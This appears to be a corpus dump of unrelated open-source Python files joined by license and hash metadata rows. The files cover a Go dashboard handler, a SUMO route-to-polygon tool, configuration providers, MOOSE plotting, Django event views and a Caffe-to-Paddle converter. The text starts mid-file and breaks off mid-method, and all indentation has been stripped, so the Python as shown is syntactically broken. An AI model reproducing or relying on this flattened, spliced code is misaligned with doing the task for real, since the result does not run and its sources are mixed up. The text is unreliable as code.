def tzname(self, dt):
return None
def dst(self, dt):
return datetime.timedelta(0)
def validNode(node):
if len(node) != 40:
return False
for x in node:
o = ord(x)
if (o < ord('0') or o > ord('9')) and (o < ord('a') or o > ord('f')):
return False
return True
def parseDate(date):
if '-' in date:
(a, offset) = date.split('-', 1)
try:
return datetime.datetime.fromtimestamp(float(a), FixedOffset(0-int(offset)))
except ValueError:
return None
if '+' in date:
(a, offset) = date.split('+', 1)
try:
return datetime.datetime.fromtimestamp(float(a), FixedOffset(int(offset)))
except ValueError:
return None
try:
return datetime.datetime.utcfromtimestamp(float(date))
except ValueError:
return None
email_re = re.compile('^[^<]+<([^>]*)>$')
def toUsername(user):
r = email_re.match(user)
if r is None:
return user
email = r.groups()[0]
return email.replace('@golang.org', '')
def dateToShortStr(d):
return d.strftime('%a %b %d %H:%M')
def parseBuild(build):
[builder, logblob] = build.split('`')
return {'builder': builder, 'log': logblob, 'ok': len(logblob) == 0}
def nodeInfo(c):
return {
"node": c.node,
"user": toUsername(c.user),
"date": dateToShortStr(c.date),
"desc": c.desc,
"shortdesc": c.desc.split('\n', 2)[0]
}
def toRev(c):
b = nodeInfo(c)
b['builds'] = [parseBuild(build) for build in c.builds]
return b
def byBuilder(x, y):
return cmp(x['builder'], y['builder'])
# Give old builders work; otherwise they pound on the web site.
class Hwget(DashboardHandler):
def get(self):
self.response.out.write("8000\n")
# This is the URL map for the server. The first three entries are public, the
# rest are only used by the builders.
application = webapp.WSGIApplication(
[('/', MainPage),
('/hw-get', Hwget),
('/log/.*', LogHandler),
('/commit', CommitHandler),
('/init', Init),
('/todo', Todo),
('/build', Build),
], debug=True)
def main():
run_wsgi_app(application)
if __name__ == "__main__":
main()
| bsd-3-clause | 3,911,460,761,777,126,000 | 30.888889 | 108 | 0.570754 | false |
cathyyul/sumo-0.18 | tools/route/route2poly.py | 2 | 2792 | #!/usr/bin/env python
"""
@file route2poly.py
@author Jakob Erdmann
@date 2012-11-15
@version $Id: route2poly.py 14425 2013-08-16 20:11:47Z behrisch $
From a sumo network and a route file, this script generates a polygon (polyline)
for every route, which can be loaded with sumo-gui for visualization.
SUMO, Simulation of Urban MObility; see http://sumo-sim.org/
Copyright (C) 2007-2013 DLR (http://www.dlr.de/) and contributors
All rights reserved
"""
import sys
import os
import colorsys
import itertools
from random import random
from optparse import OptionParser
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from sumolib.output import parse
from sumolib.net import readNet
def parse_args():
USAGE = "Usage: " + sys.argv[0] + " <netfile> <routefile> [options]"
optParser = OptionParser()
optParser.add_option("-o", "--outfile", help="name of output file")
optParser.add_option("-u", "--hue", default="random", help="hue for polygons (float from [0,1] or 'random')")
optParser.add_option("-s", "--saturation", default=1, help="saturation for polygons (float from [0,1] or 'random')")
optParser.add_option("-b", "--brightness", default=1, help="brightness for polygons (float from [0,1] or 'random')")
optParser.add_option("-l", "--layer", default=100, help="layer for generated polygons")
options, args = optParser.parse_args()
try:
options.net, options.routefile = args
options.colorgen = Colorgen((options.hue, options.saturation, options.brightness))
except:
sys.exit(USAGE)
if options.outfile is None:
options.outfile = options.routefile + ".poly.xml"
return options
class Colorgen:
def __init__(self, hsv):
self.hsv = hsv
def get_value(self, opt):
if opt == 'random':
return random()
else:
return float(opt)
def __call__(self):
"""return constant or randomized rgb-color string"""
return ','.join(map(str, colorsys.hsv_to_rgb(*map(self.get_value, self.hsv))))
def generate_poly(net, id, color, layer, edges, outf):
shape = list(itertools.chain(*list(net.getEdge(e).getShape() for e in edges)))
shapeString = ' '.join('%s,%s' % (x,y) for x,y in shape)
outf.write('<poly id="%s" color="%s" layer="%s" type="route" shape="%s"/>\n' % (
id, color, layer, shapeString))
def main():
options = parse_args()
net = readNet(options.net)
with open(options.outfile, 'w') as outf:
outf.write('<polygons>\n')
for vehicle in parse(options.routefile, 'vehicle'):
generate_poly(net, vehicle.id, options.colorgen(), options.layer, vehicle.route[0].edges.split(), outf)
outf.write('</polygons>\n')
if __name__ == "__main__":
main()
| gpl-3.0 | -629,852,987,685,948,400 | 36.226667 | 120 | 0.64649 | false |
GaretJax/coolfig | coolfig/providers.py | 1 | 2341 | import errno
import os
from functools import partial
NOT_PROVIDED = object()
class ConfigurationProvider(object):
def get(self, key):
raise NotImplementedError()
def iterprefixed(self, prefix):
raise NotImplementedError()
class DictConfig(ConfigurationProvider):
"""
Loads configuration values from the passed dictionary.
"""
def __init__(self, conf_dict, prefix=""):
self._conf_dict = conf_dict
self._prefix = prefix
def get(self, key):
try:
return self._conf_dict[self._prefix + key]
except KeyError:
return NOT_PROVIDED
def iterprefixed(self, prefix):
prefix = self._prefix + prefix
for k in self._conf_dict:
if k.startswith(prefix):
yield (k[len(self._prefix) :], self._conf_dict[k])
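# Usage sketch for DictConfig (values are made-up; behaviour follows the
# methods defined above):
#
#   >>> cfg = DictConfig({'APP_NAME': 'demo', 'APP_DEBUG': '1'}, prefix='APP_')
#   >>> cfg.get('NAME')
#   'demo'
#   >>> cfg.get('MISSING') is NOT_PROVIDED
#   True
#   >>> sorted(cfg.iterprefixed('D'))
#   [('DEBUG', '1')]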
class EnvDirConfig(ConfigurationProvider):
def __init__(self, base_path, prefix=""):
self._base_path = base_path
self._prefix = prefix
def get(self, key):
path = os.path.join(self._base_path, key)
try:
with open(path) as fh:
return fh.read()
except IOError as e:
if e.errno == errno.EACCES: # Wrong permissions
raise
return NOT_PROVIDED # File does not exist
def iterprefixed(self, prefix):
prefix = self._prefix + prefix
if os.path.exists(self._base_path):
for k in os.listdir(self._base_path):
path = os.path.join(self._base_path, k)
if k.startswith(prefix) and os.path.isfile(path):
yield (k[len(self._prefix) :], self.get(k))
class FallbackProvider(ConfigurationProvider):
def __init__(self, providers):
self._providers = list(providers)
def get(self, key):
for provider in self._providers:
value = provider.get(key)
if value is not NOT_PROVIDED:
break
else:
value = NOT_PROVIDED
return value
def iterprefixed(self, prefix):
seen = set()
for provider in self._providers:
for k, v in provider.iterprefixed(prefix):
if k not in seen:
seen.add(k)
yield k, v
EnvConfig = partial(DictConfig, os.environ)
| mit | -3,658,767,841,437,671,000 | 26.541176 | 66 | 0.567706 | false |
harterj/moose | modules/porous_flow/doc/content/modules/porous_flow/tests/fluidstate/fluidstate.py | 12 | 5385 | #!/usr/bin/env python3
#* This file is part of the MOOSE framework
#* https://www.mooseframework.org
#*
#* All rights reserved, see COPYRIGHT for full restrictions
#* https://github.com/idaholab/moose/blob/master/COPYRIGHT
#*
#* Licensed under LGPL 2.1, please see LICENSE for details
#* https://www.gnu.org/licenses/lgpl-2.1.html
import matplotlib.pyplot as plt
import numpy as np
#
# The similarity solution (r^2/t) is applicable even when dissolution is included
#
# Read MOOSE simulation data for constant time (tdata) and constant
# radial distance (rdata) using the water-ncg fluid state
tdata = np.genfromtxt('../../../../../../test/tests/fluidstate/gold/theis_tabulated_csvout_line_0010.csv', delimiter = ',', names = True, dtype = float)
rdata = np.genfromtxt('../../../../../../test/tests/fluidstate/gold/theis_tabulated_csvout.csv', delimiter = ',', names = True, dtype = float)
# Distance where data is sampled as a function of time
r = 1
# Time where data is sampled along the spatial dimension
t = 8e2
plt.figure(0)
fig, axes = plt.subplots(1, 2, figsize = (15, 4))
# Gas pressure vs similarity solution
axes[0].plot(tdata['x']**2 / t, tdata['pgas'] * 1e-6, label = 'Fixed $t$')
axes[0].plot(r**2 / rdata['time'], rdata['pgas'] * 1e-6, 'o', label = 'Fixed $r$')
axes[0].set_xscale('log')
#axes[0].set_xlim([1e-4, 5e1])
axes[0].set_xlabel('$\zeta = r^2/t$')
axes[0].set_ylabel('Gas pressure (MPa)')
axes[0].legend()
# Total mass fraction vs similarity solution
axes[1].plot(tdata['x']**2 / t, tdata['zi'], label = 'Fixed $t$')
axes[1].plot(r**2 / rdata['time'], rdata['zi'], 'o', label = 'Fixed $r$')
axes[1].set_xscale('log')
#axes[1].set_xlim([1e-4, 5e1])
#axes[1].set_ylim([-0.1, 1.1])
axes[1].set_xlabel('$\zeta = r^2/t$')
axes[1].set_ylabel('Total mass fraction (-)')
axes[1].legend()
plt.tight_layout()
plt.savefig("theis_similarity_waterncg_fig.png")
plt.figure(1)
fig, axes = plt.subplots(1, 2, figsize = (15, 4))
# Gas saturation vs similarity solution
axes[0].plot(tdata['x']**2 / t, tdata['saturation_gas'], label = 'Fixed $t$')
axes[0].plot(r**2 / rdata['time'], rdata['sgas'], 'o', label = 'Fixed $r$')
axes[0].set_xscale('log')
#axes[0].set_xlim([1e-4, 5e1])
axes[0].set_xlabel('$\zeta = r^2/t$')
axes[0].set_ylabel('Gas saturation')
axes[0].legend()
# Dissolved gas mass fraction vs similarity solution
axes[1].plot(tdata['x']**2 / t, tdata['x1'], label = 'Fixed $t$')
axes[1].plot(r**2 / rdata['time'], rdata['x1'], 'o', label = 'Fixed $r$')
axes[1].set_xscale('log')
#axes[1].set_xlim([1e-4, 5e1])
#axes[1].set_ylim([-0.1, 1.1])
axes[1].set_xlabel('$\zeta = r^2/t$')
axes[1].set_ylabel('Dissolved gas mass fraction (-)')
axes[1].legend()
plt.tight_layout()
plt.savefig("theis_similarity_waterncg_fig2.png")
#
# Read MOOSE simulation data for constant time (tdata) and constant
# radial distance (rdata) using the brine-co2 fluid state
tdata = np.genfromtxt('../../../../../../test/tests/fluidstate/gold/theis_brineco2_csvout_line_0028.csv', delimiter = ',', names = True, dtype = float)
rdata = np.genfromtxt('../../../../../../test/tests/fluidstate/gold/theis_brineco2_csvout.csv', delimiter = ',', names = True, dtype = float)
# Distance where data is sampled as a function of time
r = 4
# Time where data is sampled along the spatial dimension
t = 1e5
plt.figure(2)
fig, axes = plt.subplots(3, 1, figsize = (8, 8))
# Gas pressure vs similarity solution
axes[0].plot(tdata['x']**2 / t, tdata['pgas'] * 1e-6, label = 'Fixed $t$')
axes[0].plot(r**2 / rdata['time'], rdata['pgas'] * 1e-6, 'o', label = 'Fixed $r$')
axes[0].set_xscale('log')
axes[0].set_xlim([1e-4, 2e1])
axes[0].set_xlabel('$\zeta = r^2/t$')
axes[0].set_ylabel('Gas pressure (MPa)')
axes[0].legend()
# Total mass fraction vs similarity solution
axes[1].plot(tdata['x']**2 / t, tdata['zi'], label = 'Fixed $t$')
axes[1].plot(r**2 / rdata['time'], rdata['zi'], 'o', label = 'Fixed $r$')
axes[1].set_xscale('log')
axes[1].set_xlim([1e-4, 2e1])
axes[1].set_ylim([-0.1, 1.1])
axes[1].set_xlabel('$\zeta = r^2/t$')
axes[1].set_ylabel('Total CO$_2$ mass fraction (-)')
axes[1].legend()
# NaCl mass fraction vs similarity solution
axes[2].plot(tdata['x']**2 / t, tdata['xnacl'], label = 'Fixed $t$')
axes[2].plot(r**2 / rdata['time'], rdata['xnacl'], 'o', label = 'Fixed $r$')
axes[2].set_xscale('log')
axes[2].set_xlim([1e-4, 2e1])
axes[2].set_ylim([0.09, 0.11])
axes[2].set_xlabel('$\zeta = r^2/t$')
axes[2].set_ylabel('NaCl mass fraction (-)')
axes[2].legend()
plt.tight_layout()
plt.savefig("theis_similarity_brineco2_fig.png")
plt.figure(3)
fig, axes = plt.subplots(2, 1, figsize = (8, 8))
# Gas saturation vs similarity solution
axes[0].plot(tdata['x']**2 / t, tdata['saturation_gas'], label = 'Fixed $t$')
axes[0].plot(r**2 / rdata['time'], rdata['sgas'], 'o', label = 'Fixed $r$')
axes[0].set_xscale('log')
axes[0].set_xlim([1e-4, 2e1])
axes[0].set_xlabel('$\zeta = r^2/t$')
axes[0].set_ylabel('Gas saturation (-)')
axes[0].legend()
# Dissolved gas mass fraction vs similarity solution
axes[1].plot(tdata['x']**2 / t, tdata['x1'], label = 'Fixed $t$')
axes[1].plot(r**2 / rdata['time'], rdata['x1'], 'o', label = 'Fixed $r$')
axes[1].set_xscale('log')
axes[1].set_xlim([1e-4, 2e1])
axes[1].set_xlabel('$\zeta = r^2/t$')
axes[1].set_ylabel('Dissolved CO$_2$ mass fraction (-)')
axes[1].legend()
plt.tight_layout()
plt.savefig("theis_similarity_brineco2_fig2.png")
| lgpl-2.1 | -285,013,033,532,436,960 | 39.488722 | 152 | 0.647354 | false |
ercchy/coding-events | web/views/events.py | 1 | 11422 | from django.contrib.gis.geoip import GeoIPException
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.template import loader
from django.template import Context
from django.http import HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from django.contrib import messages
from django.core import serializers
from django.core.urlresolvers import reverse
from django_countries import countries
from api.processors import get_event_by_id
from api.processors import get_filtered_events
from api.processors import get_approved_events
from api.processors import get_pending_events
from api.processors import get_created_events
from api.processors import get_next_or_previous
from api.processors import get_nearby_events
from web.forms.event_form import AddEventForm
from web.forms.event_form import SearchEventForm
from web.processors.event import get_initial_data
from web.processors.event import change_event_status
from web.processors.event import reject_event_status
from web.processors.event import create_or_update_event
from web.processors.user import update_user_email
from web.processors.user import get_ambassadors
from web.processors.event import get_client_ip
from web.processors.event import get_lat_lon_from_user_ip
from web.processors.event import list_countries, list_active_countries
from web.processors.event import get_country
from web.processors.event import get_country_from_user_ip
from web.processors.event import count_approved_events_for_country
from web.processors.media import process_image
from web.processors.media import ImageSizeTooLargeException
from web.processors.media import UploadImageError
from web.decorators.events import can_edit_event
from web.decorators.events import can_moderate_event
from web.decorators.events import is_ambassador
from django.http import Http404
from django.shortcuts import redirect
from django.core.exceptions import ObjectDoesNotExist
"""
Do not Query the database directly from te view.
Use a processors file within the api app, put all of your queries there and
then call your newly created function in view!!! .-Erika
"""
def index(request):
template = 'pages/index.html'
past = request.GET.get('past', 'no')
user_ip = get_client_ip(forwarded=request.META.get('HTTP_X_FORWARDED_FOR'),
remote=request.META.get('REMOTE_ADDR'))
country = get_country_from_user_ip(user_ip)
try:
lan_lon = get_lat_lon_from_user_ip(user_ip) or (58.08695, 5.58121)
except GeoIPException:
lan_lon = (58.08695, 5.58121)
ambassadors = get_ambassadors(country['country_code'])
all_countries = list_active_countries()
return render_to_response(
template, {
'lan_lon': lan_lon,
'country': country,
# all_countries minus two CUSTOM_COUNTRY_ENTRIES
'all_countries': all_countries,
'past': past,
'ambassadors': ambassadors,
},
context_instance=RequestContext(request))
def map(request):
template = 'pages/map.html'
past = request.GET.get('past', 'no')
user_ip = get_client_ip(forwarded=request.META.get('HTTP_X_FORWARDED_FOR'),
remote=request.META.get('REMOTE_ADDR'))
country = get_country_from_user_ip(user_ip)
try:
lan_lon = get_lat_lon_from_user_ip(user_ip) or (58.08695, 5.58121)
except GeoIPException:
lan_lon = (58.08695, 5.58121)
ambassadors = get_ambassadors(country['country_code'])
all_countries = list_countries()
return render_to_response(
template, {
'lan_lon': lan_lon,
'country': country,
# all_countries minus two CUSTOM_COUNTRY_ENTRIES
'all_countries': all_countries[2:],
'past': past,
'ambassadors': ambassadors,
},
context_instance=RequestContext(request))
@login_required
def add_event(request):
if request.method == 'POST':
event_form = AddEventForm(data=request.POST, files=request.FILES)
if event_form.is_valid():
picture = request.FILES.get('picture', None)
event_data = {}
try:
if picture:
if picture.size > (256 * 1024):
raise ImageSizeTooLargeException('Image size too large.')
event_data['picture'] = process_image(picture)
event_data.update(event_form.cleaned_data)
event_data['creator'] = request.user
# checking if user entered a different email than in her profile
if request.user.email != event_data['user_email']:
update_user_email(request.user.id, event_data['user_email'])
event_data.pop('user_email')
event = create_or_update_event(**event_data)
t = loader.get_template('alerts/thank_you.html')
c = Context({'event': event, })
messages.info(request, t.render(c))
return HttpResponseRedirect(reverse('web.view_event', args=[event.pk, event.slug]))
except ImageSizeTooLargeException:
messages.error(request, 'The image is just a bit too big for us. '
'Please reduce your image size and try again.')
except UploadImageError as e:
messages.error(request, e.message)
else:
event_form = AddEventForm(initial={'user_email': request.user.email})
return render_to_response("pages/add_event.html", {
'form': event_form,
}, context_instance=RequestContext(request))
@login_required
@can_edit_event
def edit_event(request, event_id):
event = get_event_by_id(event_id)
user = request.user
initial = get_initial_data(event)
initial['user_email'] = request.user.email
event_data = {}
if request.method == 'POST':
event_form = AddEventForm(data=request.POST, files=request.FILES)
else:
event_form = AddEventForm(initial=initial)
existing_picture = event.picture
if event_form.is_valid():
# picture_check works with jasny bootstrap magix
picture_check = request.POST.get('picture')
picture = request.FILES.get('picture', None)
event_data = event_form.cleaned_data
event_data['creator'] = request.user
# checking if user entered a different email than in her profile
if user.email != event_data['user_email']:
update_user_email(user.id, event_data['user_email'])
event_data.pop('user_email')
try:
if picture:
if picture.size > (256 * 1024):
raise ImageSizeTooLargeException('Image size too large.')
event_data['picture'] = process_image(picture)
elif picture_check == "nochange":
event_data['picture'] = existing_picture
else:
del event_data['picture']
create_or_update_event(event_id, **event_data)
return HttpResponseRedirect(reverse('web.view_event',
kwargs={'event_id': event.id, 'slug': event.slug}))
except ImageSizeTooLargeException:
messages.error(request, 'The image is just a bit too big for us (must be up to 256 kb). '
'Please reduce your image size and try again.')
except UploadImageError as e:
messages.error(request, e.message)
return render_to_response(
'pages/add_event.html', {
'form': event_form,
'address': event_data.get('location', None),
'editing': True,
'picture_url': event.picture,
}, context_instance=RequestContext(request))
def view_event_by_country(request, country_code):
event_list = get_approved_events(country_code=country_code)
return render_to_response(
'pages/list_events.html', {
'event_list': event_list,
'country_code': country_code,
}, context_instance=RequestContext(request))
def view_event(request, event_id, slug):
try:
event = get_event_by_id(event_id)
except ObjectDoesNotExist as e:
raise Http404
next_event = get_next_or_previous(event, country_code=event.country)
nearby = get_nearby_events(event, limit=4)
return render_to_response(
'pages/view_event.html', {
'event': event,
'next_event': next_event,
'nearby': nearby
}, context_instance=RequestContext(request))
def view_event_by_id(request, event_id):
try:
event = get_event_by_id(event_id)
except ObjectDoesNotExist as e:
raise Http404
return redirect(view_event, event_id, event.slug)
@login_required
@is_ambassador
def list_pending_events(request, country_code):
"""
Display a list of pending events.
"""
active_page = request.GET.get('page','')
if request.user.is_staff:
event_list = get_pending_events(past=True)
event_list = sorted(event_list, key=lambda a: a.country.code)
else:
event_list = get_pending_events(country_code=country_code, past=True)
country_name = unicode(dict(countries)[country_code])
return render_to_response(
'pages/list_events.html', {
'event_list': event_list,
'status': 'pending',
'country_code': country_code,
'country_name': country_name,
'active_page': active_page
}, context_instance=RequestContext(request))
@login_required
@is_ambassador
def list_approved_events(request, country_code):
"""
Display a list of approved events.
"""
event_list = get_approved_events(country_code=country_code, past=True)
country_name = unicode(dict(countries)[country_code])
return render_to_response('pages/list_events.html', {
'event_list': event_list,
'status': 'approved',
'country_code': country_code,
'country_name': country_name
}, context_instance=RequestContext(request))
@login_required
def created_events(request):
"""
Display a list of pending events.
"""
creator = request.user
event_list = get_created_events(creator=creator, past=True)
return render_to_response(
'pages/list_user_events.html', {
'event_list': event_list,
}, context_instance=RequestContext(request))
def search_events(request):
country_code = request.GET.get('country_code', None)
if not country_code:
country_code = request.GET.get('country', None)
if not country_code:
user_ip = get_client_ip(forwarded=request.META.get('HTTP_X_FORWARDED_FOR'),
remote=request.META.get('REMOTE_ADDR'))
country = get_country(country_code, user_ip)
country_code = country['country_code']
past = request.GET.get('past', 'no')
past_events = False
if past == 'yes':
past_events = True
search_query = request.GET.get('q', '')
page = request.GET.get('page', None)
theme_filter = request.GET.get('theme', None)
audience_filter = request.GET.get('audience', None)
template = 'pages/search_events.html'
page_template = 'pages/ajax_faceted_search_events.html'
form = SearchEventForm(country_code=country_code, past_events=past, search=search_query)
events = get_filtered_events(search_query, country_code, theme_filter,audience_filter, past_events)
if request.is_ajax():
return render_to_response(
page_template,
{
'events':events,
'page': page
},
context_instance=RequestContext(request))
return render_to_response(
template,
{
'page_template': page_template,
'events': events,
'form': form,
'country': country_code,
},
context_instance=RequestContext(request))
def scoreboard(request):
template = 'pages/scoreboard.html'
counts = count_approved_events_for_country()
return render_to_response(
template, {
'counts': counts,
},
context_instance=RequestContext(request))
@login_required
@can_moderate_event
def change_status(request, event_id):
event = change_event_status(event_id)
return HttpResponseRedirect(reverse('web.view_event', args=[event_id, event.slug]))
@login_required
@can_moderate_event
def reject_status(request, event_id):
event = reject_event_status(event_id)
return HttpResponseRedirect(reverse('web.view_event', args=[event_id, event.slug]))
| mit | 4,533,266,203,250,255,400 | 28.979003 | 101 | 0.717913 | false |
kuke/models | fluid/PaddleCV/caffe2fluid/kaffe/paddle/transformer.py | 1 | 13679 | import numpy as np
from ..errors import KaffeError, print_stderr
from ..graph import GraphBuilder, NodeMapper
from ..layers import NodeKind
from ..transformers import (DataInjector, DataReshaper, NodeRenamer,
SubNodeFuser, ReLUFuser, BatchNormScaleBiasFuser,
BatchNormPreprocessor, ParameterNamer, CropFuser)
from . import network
class PaddleNode(object):
'''An intermediate representation for Paddle operations.'''
def __init__(self, op, *args, **kwargs):
# A string corresponding to the Paddle operation
self.op = op
# Positional arguments for the operation
self.args = args
# Keyword arguments for the operation
self.kwargs = list(kwargs.items())
# The source Caffe node
self.node = None
def format(self, arg):
'''Returns a string representation for the given value.'''
return "'%s'" % arg if isinstance(arg, basestring) else str(arg)
def pair(self, key, value):
'''Returns key=formatted(value).'''
return '%s=%s' % (key, self.format(value))
def emit(self):
'''Emits the Python source for this node.'''
# Format positional arguments
args = map(self.format, self.args)
# Format any keyword arguments
if self.kwargs:
args += [self.pair(k, v) for k, v in self.kwargs]
# Set the node name
args.append(self.pair('name', self.node.name))
args = ', '.join(args)
return '%s(%s)' % (self.op, args)
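# Illustrative sketch (hypothetical values): given a PaddleNode built by one of
# the map_* methods below and attached to a graph node named 'conv1', emit()
# produces the call that PaddleEmitter prefixes with 'self.' and writes out.
#
#   n = PaddleNode('conv', 3, 3, 64, 1, 1, padding=[1, 1])
#   n.node = graph_node                 # the source Caffe node, name 'conv1'
#   n.emit()  # -> "conv(3, 3, 64, 1, 1, padding=[1, 1], name='conv1')"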
class MaybeActivated(object):
def __init__(self, node, default=True):
self.inject_kwargs = {}
if node.metadata.get('relu', False) != default:
self.inject_kwargs['relu'] = not default
default_slope = 0.0
slope = node.metadata.get('relu_negative_slope', default_slope)
if slope != default_slope:
self.inject_kwargs['relu_negative_slope'] = slope
def __call__(self, *args, **kwargs):
kwargs.update(self.inject_kwargs)
return PaddleNode(*args, **kwargs)
class PaddleMapper(NodeMapper):
def get_kernel_params(self, node):
kernel_params = node.layer.kernel_parameters
input_shape = node.get_only_parent().output_shape
padding = [kernel_params.pad_h, kernel_params.pad_w]
if padding[0] == 0 and padding[1] == 0:
padding = {}
else:
padding = {'padding': padding}
return (kernel_params, padding)
def map_convolution(self, node):
(kernel_params, kwargs) = self.get_kernel_params(node)
h = kernel_params.kernel_h
w = kernel_params.kernel_w
c_o = node.output_shape[1]
c_i = node.parents[0].output_shape[1]
group = node.parameters.group
if group != 1:
kwargs['group'] = group
if not node.parameters.bias_term:
kwargs['biased'] = False
if kernel_params.dila_h != 1 or kernel_params.dila_w != 1:
kwargs['dilation'] = (kernel_params.dila_h, kernel_params.dila_w)
assert kernel_params.kernel_h == h
assert kernel_params.kernel_w == w
return MaybeActivated(node)(
'conv', kernel_params.kernel_h, kernel_params.kernel_w, c_o,
kernel_params.stride_h, kernel_params.stride_w, **kwargs)
def map_deconvolution(self, node):
(kernel_params, kwargs) = self.get_kernel_params(node)
h = kernel_params.kernel_h
w = kernel_params.kernel_w
c_o = node.output_shape[1]
c_i = node.parents[0].output_shape[1]
if not node.parameters.bias_term:
kwargs['biased'] = False
if kernel_params.dila_h != 1 or kernel_params.dila_w != 1:
kwargs['dilation'] = (kernel_params.dila_h, kernel_params.dila_w)
assert kernel_params.kernel_h == h
assert kernel_params.kernel_w == w
return MaybeActivated(node)(
'deconv', kernel_params.kernel_h, kernel_params.kernel_w, c_o,
kernel_params.stride_h, kernel_params.stride_w, **kwargs)
def map_relu(self, node):
return PaddleNode('relu')
def map_prelu(self, node):
channel_shared = getattr(node.parameters, 'channel_shared', False)
return PaddleNode('prelu', channel_shared)
def map_tanh(self, node):
return PaddleNode('tanh')
def map_pooling(self, node):
pool_type = node.parameters.pool
if pool_type == 0:
pool_op = 'max_pool'
elif pool_type == 1:
pool_op = 'avg_pool'
else:
# Stochastic pooling, for instance.
raise KaffeError('Unsupported pooling type.')
ceil_mode = getattr(node.layer.parameters, 'ceil_mode', True)
global_pool = getattr(node.layer.parameters, 'global_pooling', False)
if global_pool:
input_shape = node.get_only_parent().output_shape
return PaddleNode(pool_op, input_shape.height, input_shape.width, 1,
1, ceil_mode)
else:
(kernel_params, padding) = self.get_kernel_params(node)
return PaddleNode(pool_op, kernel_params.kernel_h,
kernel_params.kernel_w, kernel_params.stride_h,
kernel_params.stride_w, ceil_mode, **padding)
def map_sigmoid(self, node):
return PaddleNode('sigmoid')
def map_custom(self, node):
from .. import custom_layers
return custom_layers.make_node(PaddleNode, node.kind, node)
def map_inner_product(self, node):
#TODO: Axis
assert node.parameters.axis == 1
#TODO: Unbiased
assert node.parameters.bias_term == True
return MaybeActivated(node)('fc', node.parameters.num_output)
def map_softmax(self, node):
return PaddleNode('softmax', node.parameters.axis)
def map_lrn(self, node):
params = node.parameters
# The window size must be an odd value. For a window
# size of (2*n+1), Paddle defines depth_radius = n.
assert params.local_size % 2 == 1
# Caffe scales by (alpha/(2*n+1)), whereas Paddle
# just scales by alpha (as does Krizhevsky's paper).
# We'll account for that here.
alpha = params.alpha / float(params.local_size)
return PaddleNode('lrn', params.local_size, alpha, params.beta)
def map_concat(self, node):
return PaddleNode('concat', node.parameters.axis)
def map_dropout(self, node):
return PaddleNode('dropout', node.parameters.dropout_ratio)
def map_batch_norm(self, node):
scale_offset = len(node.data) == 4
#this default value comes from caffe's param in batch_norm
default_eps = 1e-5
kwargs = {'scale_offset': scale_offset}
if node.parameters.eps != default_eps:
kwargs['eps'] = node.parameters.eps
return MaybeActivated(
node, default=False)('batch_normalization', **kwargs)
def map_eltwise(self, node):
operations = {0: 'multiply', 1: 'add', 2: 'max'}
op_code = node.parameters.operation
try:
return PaddleNode(operations[op_code])
except KeyError:
raise KaffeError('Unknown elementwise operation: {}'.format(
op_code))
def map_scale(self, node):
params = node.parameters
return PaddleNode('scale', axis=params.axis, num_axes=params.num_axes)
def commit(self, chains):
return chains
class PaddleEmitter(object):
def __init__(self, tab=None):
self.tab = tab or ' ' * 4
self.prefix = ''
self.net_name = ''
def indent(self):
self.prefix += self.tab
def outdent(self):
self.prefix = self.prefix[:-len(self.tab)]
def statement(self, s):
return self.prefix + s + '\n'
def emit_imports(self):
import inspect
codes = []
codes.append(
'### generated by caffe2fluid, your net is in class "%s" ###\n' %
(self.net_name))
network_source = inspect.getsource(network)
codes.append(network_source + '\n')
return self.statement('\n'.join(codes))
def emit_setup_def(self):
return self.statement('def setup(self):')
def get_inputs_info(self, input_nodes):
input_shapes = {}
for n in input_nodes:
name = n.name
output_shape = n.output_shape
shape = [str(s) for s in output_shape[1:]]
input_shapes[name] = ', '.join(shape)
input_shapes = ['"%s": [%s]' % (n, l) for n, l in input_shapes.items()]
shape_str = ','.join(input_shapes)
return '{%s}' % (shape_str)
def emit_main_def(self, name):
if name is None:
return ''
self.prefix = ''
main_def = self.statement('if __name__ == "__main__":')
self.indent()
main_def += self.statement('exit(main())')
return '\n\n' + main_def
def emit_parents(self, chain):
assert len(chain)
s = 'self.feed('
sep = ', \n' + self.prefix + (' ' * len(s))
s += sep.join(
["'%s'" % parent.name for parent in chain[0].node.parents])
return self.statement(s + ')')
def emit_node(self, node):
return self.statement('self.' + node.emit())
def emit(self, name, chains, input_nodes=None):
from ..net_template import generate_net_code
from ..net_template import generate_main_code
self.net_name = name
inputs_info = self.get_inputs_info(input_nodes)
s = self.emit_imports()
s += generate_net_code(name, inputs_info) + '\n'
self.indent()
# define the net using api
s += self.emit_setup_def()
self.indent()
blocks = []
for chain in chains:
b = ''
b += self.emit_parents(chain)
for node in chain:
b += self.emit_node(node)
blocks.append(b[:-1])
s = s + '\n\n'.join(blocks)
# define the main function
s += '\n\n\n' + generate_main_code(name)
s += self.emit_main_def(name)
return s
class Transformer(object):
def __init__(self, def_path, data_path, verbose=True, phase='test'):
self.verbose = verbose
self.phase = phase
self.load(def_path, data_path, phase)
self.params = None
self.source = None
def load(self, def_path, data_path, phase):
# Build the graph
graph = GraphBuilder(def_path, phase).build()
if data_path is not None:
# Load and associate learned parameters
graph = DataInjector(def_path, data_path)(graph)
# Transform the graph
transformers = [
# Fuse split batch normalization layers
BatchNormScaleBiasFuser(),
# Fuse ReLUs
# TODO: Move non-linearity application to layer wrapper, allowing
# any arbitrary operation to be optionally activated.
ReLUFuser(allowed_parent_types=[
NodeKind.Convolution, NodeKind.InnerProduct, NodeKind.BatchNorm
]),
# Rename nodes
# Slashes are used for scoping in Paddle. Replace slashes
# in node names with underscores.
# (Caffe's GoogLeNet implementation uses slashes)
NodeRenamer(lambda node: node.name.replace('/', '_')),
# Fuse Crop
# Crop is to return a scalar output Blob for an input Blob of arbitrary size.
# When one of the input Blob is "input" or "DummyData", we can remove this input Blob
# and put the shape into the reduction layer.
CropFuser()
]
self.graph = graph.transformed(transformers)
#for the purpose of recording name mapping because of fused nodes
trace = SubNodeFuser.traced_names()
chg2real = {}
deleted = {}
for k, v in trace.items():
chg2real[k] = v[-1] #mapping from changed-name to real-name
for n in v:
if n in chg2real:
continue
if n not in deleted:
deleted[n] = '%s.%s' % (k, v[-1])
self.graph.add_name_trace({
'chg2real': chg2real,
'deleted': deleted
}, 'paddle')
# Display the graph
if self.verbose:
print_stderr(self.graph)
def transform_data(self):
if self.params is None:
transformers = [
# Reshape the parameters to Paddle's ordering
DataReshaper({
# (c_o, c_i) -> (c_i, c_o)
NodeKind.InnerProduct: (1, 0)
}),
# Pre-process batch normalization data
BatchNormPreprocessor(),
# Convert parameters to dictionaries
ParameterNamer(),
]
self.graph = self.graph.transformed(transformers)
